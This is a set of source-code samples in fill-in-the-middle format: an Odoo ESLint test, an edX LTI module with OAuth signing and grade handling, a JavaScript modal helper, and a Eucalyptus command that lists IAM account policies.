Modal.prototype.close = function close() { this._close(); };
<|file_name|>test_eslint.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- # Part of Odoo. See LICENSE file for full copyright and licensing details. import logging import re import subprocess from unittest import skipIf from odoo import tools from . import lint_case RULES = ('{' '"no-undef": "error",' '"no-restricted-globals": ["error", "event", "self"],' '"no-const-assign": ["error"],' '"no-debugger": ["error"],' '"no-dupe-class-members": ["error"]' '}' ) PARSER_OPTIONS = '{ecmaVersion: 2019, sourceType: module}' GLOBAL = ','.join([ 'owl', 'odoo', '$', 'jQuery', '_', 'Chart', 'fuzzy', 'QWeb2', 'Popover', 'StackTrace', 'QUnit', 'luxon', 'moment', 'py', 'ClipboardJS', 'globalThis', ]) _logger = logging.getLogger(__name__) try: eslint = tools.misc.find_in_path('eslint') except IOError: eslint = None <|fim▁hole|>@skipIf(eslint is None, "eslint tool not found on this system") class TestESLint(lint_case.LintCase): longMessage = True def test_eslint_version(self): """ Test that there are no eslint errors in javascript files """ files_to_check = [ p for p in self.iter_module_files('**/static/**/*.js') if not re.match('.*/libs?/.*', p) # don't check libraries ] _logger.info('Testing %s js files', len(files_to_check)) # https://eslint.org/docs/user-guide/command-line-interface cmd = [eslint, '--no-eslintrc', '--env', 'browser', '--env', 'es2017', '--parser-options', PARSER_OPTIONS, '--rule', RULES, '--global', GLOBAL] + files_to_check process = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL, check=False) self.assertEqual(process.returncode, 0, msg=process.stdout.decode())<|fim▁end|>
<|file_name|>lti_module.py<|end_file_name|><|fim▁begin|>""" Learning Tools Interoperability (LTI) module. Resources --------- Theoretical background and detailed specifications of LTI can be found on: http://www.imsglobal.org/LTI/v1p1p1/ltiIMGv1p1p1.html This module is based on the version 1.1.1 of the LTI specifications by the IMS Global authority. For authentication, it uses OAuth1. When responding back to the LTI tool provider, we must issue a correct response. Types of responses and their message payload is available at: Table A1.2 Interpretation of the 'CodeMajor/severity' matrix. http://www.imsglobal.org/gws/gwsv1p0/imsgws_wsdlBindv1p0.html A resource to test the LTI protocol (PHP realization): http://www.imsglobal.org/developers/LTI/test/v1p1/lms.php We have also begun to add support for LTI 1.2/2.0. We will keep this docstring in synch with what support is available. The first LTI 2.0 feature to be supported is the REST API results service, see specification at http://www.imsglobal.org/lti/ltiv2p0/uml/purl.imsglobal.org/vocab/lis/v2/outcomes/Result/service.html What is supported: ------------------ 1.) Display of simple LTI in iframe or a new window. 2.) Multiple LTI components on a single page. 3.) The use of multiple LTI providers per course. 4.) Use of advanced LTI component that provides back a grade. A) LTI 1.1.1 XML endpoint a.) The LTI provider sends back a grade to a specified URL. b.) Currently only action "update" is supported. "Read", and "delete" actions initially weren't required. B) LTI 2.0 Result Service JSON REST endpoint (http://www.imsglobal.org/lti/ltiv2p0/uml/purl.imsglobal.org/vocab/lis/v2/outcomes/Result/service.html) a.) Discovery of all such LTI http endpoints for a course. External tools GET from this discovery endpoint and receive URLs for interacting with individual grading units. (see lms/djangoapps/courseware/views.py:get_course_lti_endpoints) b.) GET, PUT and DELETE in LTI Result JSON binding (http://www.imsglobal.org/lti/ltiv2p0/mediatype/application/vnd/ims/lis/v2/result+json/index.html) for a provider to synchronize grades into edx-platform. Reading, Setting, and Deleteing Numeric grades between 0 and 1 and text + basic HTML feedback comments are supported, via GET / PUT / DELETE HTTP methods respectively """ import datetime from django.utils.timezone import UTC import logging import oauthlib.oauth1 from oauthlib.oauth1.rfc5849 import signature import hashlib import base64 import urllib import textwrap import bleach from lxml import etree from webob import Response import mock from xml.sax.saxutils import escape from xmodule.editing_module import MetadataOnlyEditingDescriptor from xmodule.raw_module import EmptyDataRawDescriptor from xmodule.x_module import XModule, module_attr from xmodule.course_module import CourseDescriptor from xmodule.lti_2_util import LTI20ModuleMixin, LTIError from pkg_resources import resource_string from xblock.core import String, Scope, List, XBlock from xblock.fields import Boolean, Float log = logging.getLogger(__name__) # Make '_' a no-op so we can scrape strings _ = lambda text: text DOCS_ANCHOR_TAG_OPEN = ( "<a target='_blank' " "href='http://edx.readthedocs.org/projects/ca/en/latest/exercises_tools/lti_component.html'>" ) class LTIFields(object): """ Fields to define and obtain LTI tool from provider are set here, except credentials, which should be set in course settings:: `lti_id` is id to connect tool with credentials in course settings. It should not contain :: (double semicolon) `launch_url` is launch URL of tool. `custom_parameters` are additional parameters to navigate to proper book and book page. For example, for Vitalsource provider, `launch_url` should be *https://bc-staging.vitalsource.com/books/book*, and to get to proper book and book page, you should set custom parameters as:: vbid=put_book_id_here book_location=page/put_page_number_here Default non-empty URL for `launch_url` is needed due to oauthlib demand (URL scheme should be presented):: https://github.com/idan/oauthlib/blob/master/oauthlib/oauth1/rfc5849/signature.py#L136 """ display_name = String( display_name=_("Display Name"), help=_( "Enter the name that students see for this component. " "Analytics reports may also use the display name to identify this component." ), scope=Scope.settings, default="LTI", ) lti_id = String( display_name=_("LTI ID"), help=_( "Enter the LTI ID for the external LTI provider. " "This value must be the same LTI ID that you entered in the " "LTI Passports setting on the Advanced Settings page." "<br />See {docs_anchor_open}the edX LTI documentation{anchor_close} for more details on this setting." ).format( docs_anchor_open=DOCS_ANCHOR_TAG_OPEN, anchor_close="</a>" ), default='', scope=Scope.settings ) launch_url = String( display_name=_("LTI URL"), help=_( "Enter the URL of the external tool that this component launches. " "This setting is only used when Hide External Tool is set to False." "<br />See {docs_anchor_open}the edX LTI documentation{anchor_close} for more details on this setting." ).format( docs_anchor_open=DOCS_ANCHOR_TAG_OPEN, anchor_close="</a>" ), default='http://www.example.com', scope=Scope.settings) custom_parameters = List( display_name=_("Custom Parameters"), help=_( "Add the key/value pair for any custom parameters, such as the page your e-book should open to or " "the background color for this component." "<br />See {docs_anchor_open}the edX LTI documentation{anchor_close} for more details on this setting." ).format( docs_anchor_open=DOCS_ANCHOR_TAG_OPEN, anchor_close="</a>" ), scope=Scope.settings) open_in_a_new_page = Boolean( display_name=_("Open in New Page"), help=_( "Select True if you want students to click a link that opens the LTI tool in a new window. " "Select False if you want the LTI content to open in an IFrame in the current page. " "This setting is only used when Hide External Tool is set to False. " ), default=True, scope=Scope.settings ) has_score = Boolean( display_name=_("Scored"), help=_( "Select True if this component will receive a numerical score from the external LTI system." ), default=False, scope=Scope.settings ) weight = Float( display_name=_("Weight"), help=_( "Enter the number of points possible for this component. " "The default value is 1.0. " "This setting is only used when Scored is set to True." ), default=1.0, scope=Scope.settings, values={"min": 0}, ) module_score = Float( help=_("The score kept in the xblock KVS -- duplicate of the published score in django DB"), default=None, scope=Scope.user_state ) score_comment = String( help=_("Comment as returned from grader, LTI2.0 spec"), default="", scope=Scope.user_state ) hide_launch = Boolean( display_name=_("Hide External Tool"), help=_( "Select True if you want to use this component as a placeholder for syncing with an external grading " "system rather than launch an external tool. " "This setting hides the Launch button and any IFrames for this component." ), default=False, scope=Scope.settings ) # Users will be presented with a message indicating that their e-mail/username would be sent to a third # party application. When "Open in New Page" is not selected, the tool automatically appears without any user action. ask_to_send_username = Boolean( display_name=_("Request user's username"), # Translators: This is used to request the user's username for a third party service. # Usernames can only be requested if "Open in New Page" is set to True. help=_( "Select True to request the user's username. You must also set Open in New Page to True to get the user's information." ), default=False, scope=Scope.settings ) ask_to_send_email = Boolean( display_name=_("Request user's email"), # Translators: This is used to request the user's email for a third party service. # Emails can only be requested if "Open in New Page" is set to True. help=_( "Select True to request the user's email address. You must also set Open in New Page to True to get the user's information." ), default=False, scope=Scope.settings ) description = String( display_name=_("LTI Application Information"), help=_( "Enter a description of the third party application. If requesting username and/or email, use this text box to inform users " "why their username and/or email will be forwarded to a third party application." ), default="", scope=Scope.settings ) button_text = String( display_name=_("Button Text"), help=_( "Enter the text on the button used to launch the third party application." ), default="", scope=Scope.settings ) accept_grades_past_due = Boolean( display_name=_("Accept grades past deadline"), help=_("Select True to allow third party systems to post grades past the deadline."), default=True, scope=Scope.settings ) class LTIModule(LTIFields, LTI20ModuleMixin, XModule): """ Module provides LTI integration to course. Except usual Xmodule structure it proceeds with OAuth signing. How it works:: 1. Get credentials from course settings. 2. There is minimal set of parameters need to be signed (presented for Vitalsource):: user_id oauth_callback lis_outcome_service_url lis_result_sourcedid launch_presentation_return_url lti_message_type lti_version roles *+ all custom parameters* These parameters should be encoded and signed by *OAuth1* together with `launch_url` and *POST* request type. 3. Signing proceeds with client key/secret pair obtained from course settings. That pair should be obtained from LTI provider and set into course settings by course author. After that signature and other OAuth data are generated. OAuth data which is generated after signing is usual:: oauth_callback oauth_nonce oauth_consumer_key oauth_signature_method oauth_timestamp oauth_version 4. All that data is passed to form and sent to LTI provider server by browser via autosubmit via JavaScript. Form example:: <form action="${launch_url}" name="ltiLaunchForm-${element_id}" class="ltiLaunchForm" method="post" target="ltiLaunchFrame-${element_id}" encType="application/x-www-form-urlencoded" > <input name="launch_presentation_return_url" value="" /> <input name="lis_outcome_service_url" value="" /> <input name="lis_result_sourcedid" value="" /> <input name="lti_message_type" value="basic-lti-launch-request" /> <input name="lti_version" value="LTI-1p0" /> <input name="oauth_callback" value="about:blank" /> <input name="oauth_consumer_key" value="${oauth_consumer_key}" /> <input name="oauth_nonce" value="${oauth_nonce}" /> <input name="oauth_signature_method" value="HMAC-SHA1" /> <input name="oauth_timestamp" value="${oauth_timestamp}" /> <input name="oauth_version" value="1.0" /> <input name="user_id" value="${user_id}" /> <input name="role" value="student" /> <input name="oauth_signature" value="${oauth_signature}" /> <input name="custom_1" value="${custom_param_1_value}" /> <input name="custom_2" value="${custom_param_2_value}" /> <input name="custom_..." value="${custom_param_..._value}" /> <input type="submit" value="Press to Launch" /> </form> 5. LTI provider has same secret key and it signs data string via *OAuth1* and compares signatures. If signatures are correct, LTI provider redirects iframe source to LTI tool web page, and LTI tool is rendered to iframe inside course. Otherwise error message from LTI provider is generated. """ js = { 'js': [ resource_string(__name__, 'js/src/lti/lti.js') ] } css = {'scss': [resource_string(__name__, 'css/lti/lti.scss')]} js_module_name = "LTI" def get_input_fields(self): # LTI provides a list of default parameters that might be passed as # part of the POST data. These parameters should not be prefixed. # Likewise, The creator of an LTI link can add custom key/value parameters # to a launch which are to be included with the launch of the LTI link. # In this case, we will automatically add `custom_` prefix before this parameters. # See http://www.imsglobal.org/LTI/v1p1p1/ltiIMGv1p1p1.html#_Toc316828520 PARAMETERS = [ "lti_message_type", "lti_version", "resource_link_title", "resource_link_description", "user_image", "lis_person_name_given", "lis_person_name_family", "lis_person_name_full", "lis_person_contact_email_primary", "lis_person_sourcedid", "role_scope_mentor", "context_type", "context_title", "context_label", "launch_presentation_locale", "launch_presentation_document_target", "launch_presentation_css_url", "launch_presentation_width", "launch_presentation_height", "launch_presentation_return_url", "tool_consumer_info_product_family_code", "tool_consumer_info_version", "tool_consumer_instance_guid", "tool_consumer_instance_name", "tool_consumer_instance_description", "tool_consumer_instance_url", "tool_consumer_instance_contact_email", ] client_key, client_secret = self.get_client_key_secret() # parsing custom parameters to dict custom_parameters = {} for custom_parameter in self.custom_parameters: try: param_name, param_value = [p.strip() for p in custom_parameter.split('=', 1)] except ValueError: _ = self.runtime.service(self, "i18n").ugettext msg = _('Could not parse custom parameter: {custom_parameter}. Should be "x=y" string.').format( custom_parameter="{0!r}".format(custom_parameter) ) raise LTIError(msg) # LTI specs: 'custom_' should be prepended before each custom parameter, as pointed in link above. if param_name not in PARAMETERS: param_name = 'custom_' + param_name custom_parameters[unicode(param_name)] = unicode(param_value) return self.oauth_params( custom_parameters, client_key, client_secret, ) def get_context(self): """ Returns a context. """ # use bleach defaults. see https://github.com/jsocol/bleach/blob/master/bleach/__init__.py # ALLOWED_TAGS are # ['a', 'abbr', 'acronym', 'b', 'blockquote', 'code', 'em', 'i', 'li', 'ol', 'strong', 'ul'] # # ALLOWED_ATTRIBUTES are # 'a': ['href', 'title'], # 'abbr': ['title'], # 'acronym': ['title'], # # This lets all plaintext through. sanitized_comment = bleach.clean(self.score_comment) return { 'input_fields': self.get_input_fields(), # These parameters do not participate in OAuth signing. 'launch_url': self.launch_url.strip(), 'element_id': self.location.html_id(), 'element_class': self.category, 'open_in_a_new_page': self.open_in_a_new_page, 'display_name': self.display_name, 'form_url': self.runtime.handler_url(self, 'preview_handler').rstrip('/?'), 'hide_launch': self.hide_launch, 'has_score': self.has_score, 'weight': self.weight, 'module_score': self.module_score, 'comment': sanitized_comment, 'description': self.description, 'ask_to_send_username': self.ask_to_send_username, 'ask_to_send_email': self.ask_to_send_email, 'button_text': self.button_text, 'accept_grades_past_due': self.accept_grades_past_due, } def get_html(self): """ Renders parameters to template. """ return self.system.render_template('lti.html', self.get_context()) @XBlock.handler def preview_handler(self, _, __): """ This is called to get context with new oauth params to iframe. """ template = self.system.render_template('lti_form.html', self.get_context()) return Response(template, content_type='text/html') def get_user_id(self): user_id = self.runtime.anonymous_student_id assert user_id is not None return unicode(urllib.quote(user_id)) def get_outcome_service_url(self, service_name="grade_handler"): """ Return URL for storing grades. To test LTI on sandbox we must use http scheme. While testing locally and on Jenkins, mock_lti_server use http.referer to obtain scheme, so it is ok to have http(s) anyway. The scheme logic is handled in lms/lib/xblock/runtime.py """ return self.runtime.handler_url(self, service_name, thirdparty=True).rstrip('/?') def get_resource_link_id(self): """ This is an opaque unique identifier that the TC guarantees will be unique within the TC for every placement of the link. If the tool / activity is placed multiple times in the same context, each of those placements will be distinct. This value will also change if the item is exported from one system or context and imported into another system or context. This parameter is required. Example: u'edx.org-i4x-2-3-lti-31de800015cf4afb973356dbe81496df' Hostname, edx.org, makes resource_link_id change on import to another system. Last part of location, location.name - 31de800015cf4afb973356dbe81496df, is random hash, updated by course_id, this makes resource_link_id unique inside single course. First part of location is tag-org-course-category, i4x-2-3-lti. Location.name itself does not change on import to another course, but org and course_id change. So together with org and course_id in a form of i4x-2-3-lti-31de800015cf4afb973356dbe81496df this part of resource_link_id: makes resource_link_id to be unique among courses inside same system. """ return unicode(urllib.quote("{}-{}".format(self.system.hostname, self.location.html_id()))) def get_lis_result_sourcedid(self): """ This field contains an identifier that indicates the LIS Result Identifier (if any) associated with this launch. This field identifies a unique row and column within the TC gradebook. This field is unique for every combination of context_id / resource_link_id / user_id. This value may change for a particular resource_link_id / user_id from one launch to the next. The TP should only retain the most recent value for this field for a particular resource_link_id / user_id. This field is generally optional, but is required for grading. """ return "{context}:{resource_link}:{user_id}".format( context=urllib.quote(self.context_id), resource_link=self.get_resource_link_id(), user_id=self.get_user_id() ) def get_course(self): """ Return course by course id. """ return self.descriptor.runtime.modulestore.get_course(self.course_id) @property def context_id(self): """ Return context_id. context_id is an opaque identifier that uniquely identifies the context (e.g., a course) that contains the link being launched. """ return self.course_id.to_deprecated_string() @property def role(self): """ Get system user role and convert it to LTI role. """ roles = { 'student': u'Student', 'staff': u'Administrator', 'instructor': u'Instructor', } return roles.get(self.system.get_user_role(), u'Student') def oauth_params(self, custom_parameters, client_key, client_secret): """ Signs request and returns signature and OAuth parameters. `custom_paramters` is dict of parsed `custom_parameter` field `client_key` and `client_secret` are LTI tool credentials. Also *anonymous student id* is passed to template and therefore to LTI provider. """ client = oauthlib.oauth1.Client( client_key=unicode(client_key), client_secret=unicode(client_secret) ) # Must have parameters for correct signing from LTI: body = { u'user_id': self.get_user_id(), u'oauth_callback': u'about:blank', u'launch_presentation_return_url': '', u'lti_message_type': u'basic-lti-launch-request', u'lti_version': 'LTI-1p0', u'roles': self.role, # Parameters required for grading: u'resource_link_id': self.get_resource_link_id(), u'lis_result_sourcedid': self.get_lis_result_sourcedid(), u'context_id': self.context_id, } if self.has_score: body.update({ u'lis_outcome_service_url': self.get_outcome_service_url() }) self.user_email = "" self.user_username = "" # Username and email can't be sent in studio mode, because the user object is not defined. # To test functionality test in LMS if callable(self.runtime.get_real_user): real_user_object = self.runtime.get_real_user(self.runtime.anonymous_student_id) try: self.user_email = real_user_object.email except AttributeError: self.user_email = "" try: self.user_username = real_user_object.username except AttributeError: self.user_username = "" if self.open_in_a_new_page: if self.ask_to_send_username and self.user_username: body["lis_person_sourcedid"] = self.user_username if self.ask_to_send_email and self.user_email: body["lis_person_contact_email_primary"] = self.user_email # Appending custom parameter for signing. body.update(custom_parameters) headers = { # This is needed for body encoding: 'Content-Type': 'application/x-www-form-urlencoded', } try: __, headers, __ = client.sign( unicode(self.launch_url.strip()), http_method=u'POST', body=body, headers=headers) except ValueError: # Scheme not in url. # https://github.com/idan/oauthlib/blob/master/oauthlib/oauth1/rfc5849/signature.py#L136 # Stubbing headers for now: headers = { u'Content-Type': u'application/x-www-form-urlencoded', u'Authorization': u'OAuth oauth_nonce="80966668944732164491378916897", \ oauth_timestamp="1378916897", oauth_version="1.0", oauth_signature_method="HMAC-SHA1", \ oauth_consumer_key="", oauth_signature="frVp4JuvT1mVXlxktiAUjQ7%2F1cw%3D"'} params = headers['Authorization'] # Parse headers to pass to template as part of context: params = dict([param.strip().replace('"', '').split('=') for param in params.split(',')]) params[u'oauth_nonce'] = params[u'OAuth oauth_nonce'] del params[u'OAuth oauth_nonce'] # oauthlib encodes signature with # 'Content-Type': 'application/x-www-form-urlencoded' # so '='' becomes '%3D'. # We send form via browser, so browser will encode it again, # So we need to decode signature back: params[u'oauth_signature'] = urllib.unquote(params[u'oauth_signature']).decode('utf8') # Add LTI parameters to OAuth parameters for sending in form. params.update(body) return params def max_score(self): return self.weight if self.has_score else None @XBlock.handler def grade_handler(self, request, suffix): # pylint: disable=unused-argument """ This is called by courseware.module_render, to handle an AJAX call. Used only for grading. Returns XML response. Example of request body from LTI provider:: <?xml version = "1.0" encoding = "UTF-8"?> <imsx_POXEnvelopeRequest xmlns = "some_link (may be not required)"> <imsx_POXHeader> <imsx_POXRequestHeaderInfo> <imsx_version>V1.0</imsx_version> <imsx_messageIdentifier>528243ba5241b</imsx_messageIdentifier> </imsx_POXRequestHeaderInfo> </imsx_POXHeader> <imsx_POXBody> <replaceResultRequest> <resultRecord> <sourcedGUID> <sourcedId>feb-123-456-2929::28883</sourcedId> </sourcedGUID> <result> <resultScore> <language>en-us</language> <textString>0.4</textString> </resultScore> </result> </resultRecord> </replaceResultRequest> </imsx_POXBody> </imsx_POXEnvelopeRequest> Example of correct/incorrect answer XML body:: see response_xml_template. """ response_xml_template = textwrap.dedent("""\ <?xml version="1.0" encoding="UTF-8"?> <imsx_POXEnvelopeResponse xmlns = "http://www.imsglobal.org/services/ltiv1p1/xsd/imsoms_v1p0"> <imsx_POXHeader> <imsx_POXResponseHeaderInfo> <imsx_version>V1.0</imsx_version> <imsx_messageIdentifier>{imsx_messageIdentifier}</imsx_messageIdentifier> <imsx_statusInfo> <imsx_codeMajor>{imsx_codeMajor}</imsx_codeMajor> <imsx_severity>status</imsx_severity> <imsx_description>{imsx_description}</imsx_description> <imsx_messageRefIdentifier> </imsx_messageRefIdentifier> </imsx_statusInfo> </imsx_POXResponseHeaderInfo> </imsx_POXHeader> <imsx_POXBody>{response}</imsx_POXBody> </imsx_POXEnvelopeResponse> """) # Returns when `action` is unsupported. # Supported actions: # - replaceResultRequest. unsupported_values = { 'imsx_codeMajor': 'unsupported', 'imsx_description': 'Target does not support the requested operation.', 'imsx_messageIdentifier': 'unknown', 'response': '' } # Returns if: # - past due grades are not accepted and grade is past due # - score is out of range # - can't parse response from TP; # - can't verify OAuth signing or OAuth signing is incorrect. failure_values = { 'imsx_codeMajor': 'failure', 'imsx_description': 'The request has failed.',<|fim▁hole|> 'imsx_messageIdentifier': 'unknown', 'response': '' } if not self.accept_grades_past_due and self.is_past_due(): failure_values['imsx_description'] = "Grade is past due" return Response(response_xml_template.format(**failure_values), content_type="application/xml") try: imsx_messageIdentifier, sourcedId, score, action = self.parse_grade_xml_body(request.body) except Exception as e: error_message = "Request body XML parsing error: " + escape(e.message) log.debug("[LTI]: " + error_message) failure_values['imsx_description'] = error_message return Response(response_xml_template.format(**failure_values), content_type="application/xml") # Verify OAuth signing. try: self.verify_oauth_body_sign(request) except (ValueError, LTIError) as e: failure_values['imsx_messageIdentifier'] = escape(imsx_messageIdentifier) error_message = "OAuth verification error: " + escape(e.message) failure_values['imsx_description'] = error_message log.debug("[LTI]: " + error_message) return Response(response_xml_template.format(**failure_values), content_type="application/xml") real_user = self.system.get_real_user(urllib.unquote(sourcedId.split(':')[-1])) if not real_user: # that means we can't save to database, as we do not have real user id. failure_values['imsx_messageIdentifier'] = escape(imsx_messageIdentifier) failure_values['imsx_description'] = "User not found." return Response(response_xml_template.format(**failure_values), content_type="application/xml") if action == 'replaceResultRequest': self.set_user_module_score(real_user, score, self.max_score()) values = { 'imsx_codeMajor': 'success', 'imsx_description': 'Score for {sourced_id} is now {score}'.format(sourced_id=sourcedId, score=score), 'imsx_messageIdentifier': escape(imsx_messageIdentifier), 'response': '<replaceResultResponse/>' } log.debug("[LTI]: Grade is saved.") return Response(response_xml_template.format(**values), content_type="application/xml") unsupported_values['imsx_messageIdentifier'] = escape(imsx_messageIdentifier) log.debug("[LTI]: Incorrect action.") return Response(response_xml_template.format(**unsupported_values), content_type='application/xml') @classmethod def parse_grade_xml_body(cls, body): """ Parses XML from request.body and returns parsed data XML body should contain nsmap with namespace, that is specified in LTI specs. Returns tuple: imsx_messageIdentifier, sourcedId, score, action Raises Exception if can't parse. """ lti_spec_namespace = "http://www.imsglobal.org/services/ltiv1p1/xsd/imsoms_v1p0" namespaces = {'def': lti_spec_namespace} data = body.strip().encode('utf-8') parser = etree.XMLParser(ns_clean=True, recover=True, encoding='utf-8') root = etree.fromstring(data, parser=parser) imsx_messageIdentifier = root.xpath("//def:imsx_messageIdentifier", namespaces=namespaces)[0].text or '' sourcedId = root.xpath("//def:sourcedId", namespaces=namespaces)[0].text score = root.xpath("//def:textString", namespaces=namespaces)[0].text action = root.xpath("//def:imsx_POXBody", namespaces=namespaces)[0].getchildren()[0].tag.replace('{' + lti_spec_namespace + '}', '') # Raise exception if score is not float or not in range 0.0-1.0 regarding spec. score = float(score) if not 0 <= score <= 1: raise LTIError('score value outside the permitted range of 0-1.') return imsx_messageIdentifier, sourcedId, score, action def verify_oauth_body_sign(self, request, content_type='application/x-www-form-urlencoded'): """ Verify grade request from LTI provider using OAuth body signing. Uses http://oauth.googlecode.com/svn/spec/ext/body_hash/1.0/oauth-bodyhash.html:: This specification extends the OAuth signature to include integrity checks on HTTP request bodies with content types other than application/x-www-form-urlencoded. Arguments: request: DjangoWebobRequest. Raises: LTIError if request is incorrect. """ client_key, client_secret = self.get_client_key_secret() headers = { 'Authorization': unicode(request.headers.get('Authorization')), 'Content-Type': content_type, } sha1 = hashlib.sha1() sha1.update(request.body) oauth_body_hash = base64.b64encode(sha1.digest()) oauth_params = signature.collect_parameters(headers=headers, exclude_oauth_signature=False) oauth_headers = dict(oauth_params) oauth_signature = oauth_headers.pop('oauth_signature') mock_request_lti_1 = mock.Mock( uri=unicode(urllib.unquote(self.get_outcome_service_url())), http_method=unicode(request.method), params=oauth_headers.items(), signature=oauth_signature ) mock_request_lti_2 = mock.Mock( uri=unicode(urllib.unquote(request.url)), http_method=unicode(request.method), params=oauth_headers.items(), signature=oauth_signature ) if oauth_body_hash != oauth_headers.get('oauth_body_hash'): log.error( "OAuth body hash verification failed, provided: {}, " "calculated: {}, for url: {}, body is: {}".format( oauth_headers.get('oauth_body_hash'), oauth_body_hash, self.get_outcome_service_url(), request.body ) ) raise LTIError("OAuth body hash verification is failed.") if (not signature.verify_hmac_sha1(mock_request_lti_1, client_secret) and not signature.verify_hmac_sha1(mock_request_lti_2, client_secret)): log.error("OAuth signature verification failed, for " "headers:{} url:{} method:{}".format( oauth_headers, self.get_outcome_service_url(), unicode(request.method) )) raise LTIError("OAuth signature verification has failed.") def get_client_key_secret(self): """ Obtains client_key and client_secret credentials from current course. """ course = self.get_course() for lti_passport in course.lti_passports: try: lti_id, key, secret = [i.strip() for i in lti_passport.split(':')] except ValueError: _ = self.runtime.service(self, "i18n").ugettext msg = _('Could not parse LTI passport: {lti_passport}. Should be "id:key:secret" string.').format( lti_passport='{0!r}'.format(lti_passport) ) raise LTIError(msg) if lti_id == self.lti_id.strip(): return key, secret return '', '' def is_past_due(self): """ Is it now past this problem's due date, including grace period? """ due_date = self.due # pylint: disable=no-member if self.graceperiod is not None and due_date: # pylint: disable=no-member close_date = due_date + self.graceperiod # pylint: disable=no-member else: close_date = due_date return close_date is not None and datetime.datetime.now(UTC()) > close_date class LTIDescriptor(LTIFields, MetadataOnlyEditingDescriptor, EmptyDataRawDescriptor): """ Descriptor for LTI Xmodule. """ module_class = LTIModule grade_handler = module_attr('grade_handler') preview_handler = module_attr('preview_handler') lti_2_0_result_rest_handler = module_attr('lti_2_0_result_rest_handler') clear_user_module_score = module_attr('clear_user_module_score') get_outcome_service_url = module_attr('get_outcome_service_url')<|fim▁end|>
<|file_name|>box.js<|end_file_name|><|fim▁begin|>/* eg: Box.show(div) */ var Box = { show: function (id) { var isIE = (document.all) ? true : false; var isIE6 = isIE && ( [/MSIE (\d)\.0/i.exec(navigator.userAgent)][0][1] == 6); var box = document.getElementById(id); if (!box) { return; } box.style.zIndex = "9999"; box.style.display = "block" box.style.position = !isIE6 ? "fixed" : "absolute"; box.style.top = box.style.left = "50%"; box.style.marginTop = -box.offsetHeight / 2 + "px"; box.style.marginLeft = -box.offsetWidth / 2 + "px"; var layer = document.getElementById("_box_layer"); if (!layer) { layer = document.createElement("div"); layer.id = "_box_layer"; layer.style.width = layer.style.height = "100%"; layer.style.position = !isIE6 ? "fixed" : "absolute"; layer.style.top = layer.style.left = 0; layer.style.backgroundColor = "#000"; layer.style.zIndex = "9998"; layer.style.opacity = "0.6"; document.body.appendChild(layer); } else { layer.style.display = ""; } var selects = document.getElementsByTagName("select"); if (selects) { for (var i = 0; i < selects.length; i++) { selects[i].style.visibility = "hidden"; } } function layer_iestyle() { layer.style.width = Math.max(document.documentElement.scrollWidth, document.documentElement.clientWidth) + "px"; layer.style.height = Math.max(document.documentElement.scrollHeight, document.documentElement.clientHeight) + "px"; }<|fim▁hole|> box.style.marginLeft = document.documentElement.scrollLeft - box.offsetWidth / 2 + "px"; } if (isIE) { layer.style.filter = "alpha(opacity=60)"; } if (isIE6) { layer_iestyle() box_iestyle(); window.attachEvent("onscroll", function () { box_iestyle(); }) window.attachEvent("onresize", layer_iestyle) } }, hide: function (id) { var box = document.getElementById(id); if (box) { box.style.display = "none"; } var layer = document.getElementById("_box_layer"); if (layer) { layer.style.display = "none"; } var selects = document.getElementsByTagName("select"); if (selects) { for (var i = 0; i < selects.length; i++) { selects[i].style.visibility = "visible"; } } } }<|fim▁end|>
function box_iestyle() { box.style.marginTop = document.documentElement.scrollTop - box.offsetHeight / 2 + "px";
<|file_name|>listaccountpolicies.py<|end_file_name|><|fim▁begin|># Copyright 2009-2015 Eucalyptus Systems, Inc. # # Redistribution and use of this software in source and binary forms, # with or without modification, are permitted provided that the following # conditions are met: # # Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. from requestbuilder import Arg from requestbuilder.response import PaginatedResponse from euca2ools.commands.iam import IAMRequest, arg_account_name from euca2ools.commands.iam.getaccountpolicy import GetAccountPolicy<|fim▁hole|> class ListAccountPolicies(IAMRequest): DESCRIPTION = ('[Eucalyptus only] List one or all policies ' 'policies attached to an account') ARGS = [arg_account_name(help='''name or ID of the account owning the policies to list (required)'''), Arg('-p', '--policy-name', metavar='POLICY', route_to=None, help='display a specific policy'), Arg('-v', '--verbose', action='store_true', route_to=None, help='''display the contents of the resulting policies (in addition to their names)'''), Arg('--pretty-print', action='store_true', route_to=None, help='''when printing the contents of policies, reformat them for easier reading''')] LIST_TAGS = ['PolicyNames'] def main(self): return PaginatedResponse(self, (None,), ('PolicyNames',)) def prepare_for_page(self, page): # Pages are defined by markers self.params['Marker'] = page def get_next_page(self, response): if response.get('IsTruncated') == 'true': return response['Marker'] def print_result(self, result): if self.args.get('policy_name'): # Look for the specific policy the user asked for for policy_name in result.get('PolicyNames', []): if policy_name == self.args['policy_name']: if self.args['verbose']: self.print_policy(policy_name) else: print policy_name break else: for policy_name in result.get('PolicyNames', []): print policy_name if self.args['verbose']: self.print_policy(policy_name) def print_policy(self, policy_name): req = GetAccountPolicy( service=self.service, AccountName=self.args['AccountName'], PolicyName=policy_name, pretty_print=self.args['pretty_print']) response = req.main() req.print_result(response)<|fim▁end|>
